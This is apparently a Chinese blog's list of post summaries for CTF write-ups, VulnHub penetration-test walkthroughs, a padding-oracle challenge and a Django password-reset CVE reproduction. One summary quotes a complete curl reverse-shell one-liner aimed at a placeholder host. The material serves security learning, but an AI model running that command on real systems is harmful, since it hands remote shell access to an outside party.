本文是 Google CTF 2018 Quals Beginners Quest 中的一道 Pwn 题目 Fridge todo list 的解题记录。
本文将对一个特意构造的、十分简单的、64 位的 ELF 文件的 PLT(Procedure Linkage Table)和 GOT(Global Offset Table)进行简单地静态分析。
本文简要解释了神奇的 curl 反弹 shell 命令 { curl -sNkT . https://$LHOST:$LPORT &-;} 3>&1|: 的工作原理。
本文记录了Hacker101 CTF中名为Encrypted Pastebin的题目的解法。该题要求技能为Web和Crypto,难度为Hard,共有4个flag,每个flag值9分。主要内容涉及padding oracle攻击、Python编程以及如何通过触发不同的报错获取关键信息。首发于先知社区。
本文详细记录了Django重置密码漏洞(CVE-2019-19844)的复现过程,简要分析了漏洞原理,讨论了攻击所需的条件。首发于安全客。
Overflow是来自VulnHub的难度简单、主要考察缓冲区溢出的boot2root渗透测试靶机。本文较为完整地记录了我对其进行渗透测试的全过程。涉及的知识点有栈溢出漏洞的确定,利用jmp esp执行shellcode,地址随机化防护和不可执行防护的绕过。注:首发于“安全客”。
Cybero是来自VulnHub的难度中等、具有CTF风格的boot2root渗透测试靶机。本文较为完整地记录了我对其进行渗透测试的全过程。涉及的知识点有namp端口扫描、文件上传和定时任务提权等。
unknowndevice64 V2是来自VulnHub的较为简单的渗透测试靶机。本文较为完整地记录了我对其进行渗透测试的全过程。涉及的知识点有namp端口扫描、Web登录爆破和sudo提权等。